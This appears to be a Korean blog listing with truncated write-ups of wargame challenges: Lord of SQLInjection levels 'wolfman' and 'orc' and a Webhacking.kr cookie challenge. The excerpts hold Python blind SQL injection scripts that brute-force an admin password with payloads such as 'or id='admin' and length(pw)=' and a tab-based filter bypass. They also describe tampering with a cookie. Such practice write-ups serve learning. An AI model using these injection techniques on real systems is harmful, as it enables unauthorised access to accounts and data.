Web Hacking/LOS
2021.08.07
import requests requests.packages.urllib3.disable_warnings() org_url = "https://los.rubiya.kr/chall/wolfman_4fdc56b75971e41981e3d1e2fbe9b7f7.php" header = {'Cookie': 'PHPSESSID='} session = requests.session() # Check Length of PW for i in range(0, 100): payload = "?pw=ABCD'%09or%09id='admin'%09and%09length(pw)=" + "'" + str(i) res = session.get(url = org_url + payload, headers=header, verify=Fal..
Web Hacking/LOS
2021.08.06
휴가 나가고 싶다 보고싶어 미치겠다 import requests requests.packages.urllib3.disable_warnings() org_url = "https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php" header = {'Cookie': 'PHPSESSID='} session = requests.session() # Check Length of PW for i in range(0, 100): payload = "pw=ABCD' or id='admin' and length(pw)=" + "'" + str(i) res = session.get(url = org_url + payload, headers=header, ver..
Web Hacking/Webhacking.kr
2020.10.24
php, html 언어로 이루어진 코드이다. $_COOKIE[ 'user_lv' ] ≥ 6 이면 $_COOKIE[ 'user_lv' ] = 1 로 초기화하고, $_COOKIE[ 'user_lv' ] > 5 이면 solve(1)로 문제를 해결할 수 있는 함수가 실행되는 것 같다. 따라서 쿠키값을 변조하여 5 < x
